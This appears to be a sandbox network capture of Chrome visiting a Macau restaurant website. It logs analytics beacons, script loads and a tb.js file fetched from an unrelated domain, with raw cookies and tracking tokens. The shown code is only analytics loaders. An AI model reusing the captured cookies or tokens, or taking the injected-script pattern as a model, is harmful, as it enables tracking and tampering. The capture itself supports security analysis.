                                                                                                                                                              2023-03-13 04:26:04 UTC0OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                                                                                              Host: accounts.google.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Content-Length: 1
                                                                                                                                                              Origin: https://www.google.com
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg
                                                                                                                                                              2023-03-13 04:26:04 UTC1OUTData Raw: 20
                                                                                                                                                              Data Ascii:
                                                                                                                                                              2023-03-13 04:26:04 UTC2INHTTP/1.1 200 OK
                                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                                              Access-Control-Allow-Origin: https://www.google.com
                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:04 GMT
                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-G-W7FEeQYUYlHNHlxbxJug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                              Server: ESF
                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Connection: close
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              2023-03-13 04:26:04 UTC4INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                                                                                                              Data Ascii: 11["gaia.l.a.r",[]]
                                                                                                                                                              2023-03-13 04:26:04 UTC4INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              10192.168.2.349749103.235.46.191443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:12 UTC46OUTGET /hm.gif?cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=913&et=0&ja=0&ln=en-us&lo=0&rnd=2010534784&si=3eff88a357a8c5aca6bb583a65de2875&v=1.3.0&lv=1&sn=31345&r=0&ww=1280&u=http%3A%2F%2Fwww.gourmethousemacau.com%2F&tt=Gourmet%20House%20Macau%20Ltd HTTP/1.1
                                                                                                                                                              Host: hm.baidu.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: HMACCOUNT_BFESS=C76EF187481BAB50
                                                                                                                                                              2023-03-13 04:26:12 UTC47INHTTP/1.1 200 OK
                                                                                                                                                              Cache-Control: private, max-age=0, no-cache
                                                                                                                                                              Content-Length: 43
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:12 GMT
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Server: apache
                                                                                                                                                              Strict-Transport-Security: max-age=172800
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Connection: close
                                                                                                                                                              2023-03-13 04:26:12 UTC47INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                              Data Ascii: GIF89a!,L;


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              11192.168.2.349730171.8.167.89443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:12 UTC46OUTGET /so/zz.gif?url=http%3A%2F%2Fwww.gourmethousemacau.com%2F&sid=d182b3f28525f2db83acfaaf6e696dba&token=d/1m8o2cb.3ufa2c8a5m2e5sfu2odhbt HTTP/1.1
                                                                                                                                                              Host: s.360.cn
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2023-03-13 04:26:12 UTC47INHTTP/1.1 200 OK
                                                                                                                                                              Server: openresty/1.15.8.2
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:12 GMT
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Last-Modified: Mon, 29 Oct 2018 06:07:10 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              ETag: "5bd6a38e-0"
                                                                                                                                                              Accept-Ranges: bytes


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              12192.168.2.349809104.192.108.23443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:29 UTC47OUTGET /11.0.1.js?d182b3f28525f2db83acfaaf6e696dba HTTP/1.1
                                                                                                                                                              Host: jspassport.ssl.qhimg.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              If-Modified-Since: Wed, 28 Nov 2018 07:43:20 GMT
                                                                                                                                                              2023-03-13 04:26:29 UTC48INHTTP/1.1 304 Not Modified
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:29 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Wed, 28 Nov 2018 07:43:20 GMT
                                                                                                                                                              Cache-Control: max-age=600
                                                                                                                                                              Expires: Mon, 13 Mar 2023 04:36:29 GMT
                                                                                                                                                              KCS-Via: HIT from w-fc02.lato;HIT from w-sc01.lato


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              13192.168.2.349810103.235.46.191443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:29 UTC48OUTGET /hm.js?3eff88a357a8c5aca6bb583a65de2875 HTTP/1.1
                                                                                                                                                              Host: hm.baidu.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: HMACCOUNT_BFESS=C76EF187481BAB50
                                                                                                                                                              If-None-Match: a3ff24bedc9c1af4648015185ddef181
                                                                                                                                                              2023-03-13 04:26:30 UTC49INHTTP/1.1 304 Not Modified
                                                                                                                                                              Cache-Control: max-age=0, must-revalidate
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:30 GMT
                                                                                                                                                              Etag: a3ff24bedc9c1af4648015185ddef181
                                                                                                                                                              Server: apache
                                                                                                                                                              Strict-Transport-Security: max-age=172800
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              14192.168.2.349812104.193.88.123443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:30 UTC49OUTGET /9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif?l=http://www.gourmethousemacau.com/Index.asp HTTP/1.1
                                                                                                                                                              Host: sp0.baidu.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2023-03-13 04:26:30 UTC50INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:30 GMT
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              15192.168.2.349811171.8.167.89443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:30 UTC50OUTGET /so/zz.gif?url=http%3A%2F%2Fwww.gourmethousemacau.com%2FIndex.asp&sid=d182b3f28525f2db83acfaaf6e696dba&token=dp1s8a2.bx3efd2n8I5/2m5ofc2.duba HTTP/1.1
                                                                                                                                                              Host: s.360.cn
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2023-03-13 04:26:30 UTC51INHTTP/1.1 200 OK
                                                                                                                                                              Server: openresty/1.15.8.2
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:30 GMT
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Last-Modified: Tue, 23 Jul 2019 07:36:18 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              ETag: "5d36b8f2-0"
                                                                                                                                                              Accept-Ranges: bytes


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              16192.168.2.349815103.235.46.191443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:30 UTC50OUTGET /hm.gif?cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=913&et=0&ja=0&ln=en-us&lo=0&lt=1678710370&rnd=444628624&si=3eff88a357a8c5aca6bb583a65de2875&v=1.3.0&lv=2&sn=31365&r=0&ww=1280&u=http%3A%2F%2Fwww.gourmethousemacau.com%2FIndex.asp&tt=Gourmet%20House%20Macau%20Ltd HTTP/1.1
                                                                                                                                                              Host: hm.baidu.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: HMACCOUNT_BFESS=C76EF187481BAB50
                                                                                                                                                              2023-03-13 04:26:31 UTC52INHTTP/1.1 200 OK
                                                                                                                                                              Cache-Control: private, max-age=0, no-cache
                                                                                                                                                              Content-Length: 43
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:31 GMT
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Server: apache
                                                                                                                                                              Strict-Transport-Security: max-age=172800
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Connection: close
                                                                                                                                                              2023-03-13 04:26:31 UTC52INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                              Data Ascii: GIF89a!,L;


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              17192.168.2.349820104.193.88.123443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:35 UTC52OUTGET /9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif?l=http://www.gourmethousemacau.com/Index.asp HTTP/1.1
                                                                                                                                                              Host: sp0.baidu.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2023-03-13 04:26:36 UTC53INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:36 GMT
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              18192.168.2.349822103.235.46.191443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:36 UTC52OUTGET /hm.gif?cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=913&et=0&ja=0&ln=en-us&lo=0&lt=1678710370&rnd=444628624&si=3eff88a357a8c5aca6bb583a65de2875&v=1.3.0&lv=2&sn=31365&r=0&ww=1280&u=http%3A%2F%2Fwww.gourmethousemacau.com%2FIndex.asp&tt=Gourmet%20House%20Macau%20Ltd HTTP/1.1
                                                                                                                                                              Host: hm.baidu.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: HMACCOUNT_BFESS=C76EF187481BAB50
                                                                                                                                                              2023-03-13 04:26:36 UTC53INHTTP/1.1 200 OK
                                                                                                                                                              Cache-Control: private, max-age=0, no-cache
                                                                                                                                                              Content-Length: 43
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:36 GMT
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Server: apache
                                                                                                                                                              Strict-Transport-Security: max-age=172800
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Connection: close
                                                                                                                                                              2023-03-13 04:26:36 UTC53INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                              Data Ascii: GIF89a!,L;


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              19192.168.2.349821171.8.167.89443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:37 UTC53OUTGET /so/zz.gif?url=http%3A%2F%2Fwww.gourmethousemacau.com%2FIndex.asp&sid=d182b3f28525f2db83acfaaf6e696dba&token=dp1s8a2.bx3efd2n8I5/2m5ofc2.duba HTTP/1.1
                                                                                                                                                              Host: s.360.cn
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2023-03-13 04:26:37 UTC54INHTTP/1.1 200 OK
                                                                                                                                                              Server: openresty/1.15.8.2
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:37 GMT
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Last-Modified: Tue, 23 Jul 2019 07:36:18 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              ETag: "5d36b8f2-0"
                                                                                                                                                              Accept-Ranges: bytes


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              2192.168.2.34971023.251.32.116443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:05 UTC4OUTGET /tb.js HTTP/1.1
                                                                                                                                                              Host: www.tbty20000.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2023-03-13 04:26:06 UTC4INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:06 GMT
                                                                                                                                                              Server: Apache
                                                                                                                                                              Upgrade: h2
                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                              Last-Modified: Mon, 13 Feb 2023 10:41:27 GMT
                                                                                                                                                              ETag: "125c-5f4927d49b389"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Content-Length: 4700
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                              2023-03-13 04:26:06 UTC5INData Raw: 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 33 65 66 66 38 38 61 33 35 37 61 38 63 35 61 63 61 36 62 62 35 38 33 61 36 35 64 65 32 38 37 35 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 0a
                                                                                                                                                              Data Ascii: var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?3eff88a357a8c5aca6bb583a65de2875"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              3192.168.2.349714104.192.108.23443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:07 UTC9OUTGET /11.0.1.js?d182b3f28525f2db83acfaaf6e696dba HTTP/1.1
                                                                                                                                                              Host: jspassport.ssl.qhimg.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2023-03-13 04:26:07 UTC10INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:07 GMT
                                                                                                                                                              Content-Type: application/x-javascript
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Wed, 28 Nov 2018 07:43:20 GMT
                                                                                                                                                              Cache-Control: max-age=600
                                                                                                                                                              Expires: Mon, 13 Mar 2023 04:36:07 GMT
                                                                                                                                                              KCS-Via: HIT from w-fc02.lato;HIT from w-sc01.lato
                                                                                                                                                              2023-03-13 04:26:07 UTC10INData Raw: 36 61 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 2e 73 73 6c 2e 71 68 72 65 73 32 2e 63 6f 6d 2f 73 73 6c 2f 61 62 37 37 62 36 65 61 37 66 33 66 62 66 37 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 27 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 6adocument.write('<script charset="utf-8" src="https://s.ssl.qhres2.com/ssl/ab77b6ea7f3fbf79.js"></script>')0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              4192.168.2.34971565.9.25.112443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:08 UTC10OUTGET /ssl/ab77b6ea7f3fbf79.js HTTP/1.1
                                                                                                                                                              Host: s.ssl.qhres2.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2023-03-13 04:26:08 UTC11INHTTP/1.1 200 OK
                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                              Content-Length: 478
                                                                                                                                                              Connection: close
                                                                                                                                                              Date: Mon, 13 Feb 2023 12:24:44 GMT
                                                                                                                                                              X-QSTATIC-HIT: 1
                                                                                                                                                              Last-Modified: Mon, 01 Jan 2018 00:00:00 GMT
                                                                                                                                                              ETag: W/"6a5b3175a87e4950"
                                                                                                                                                              Access-Control-Allow-Origin: *
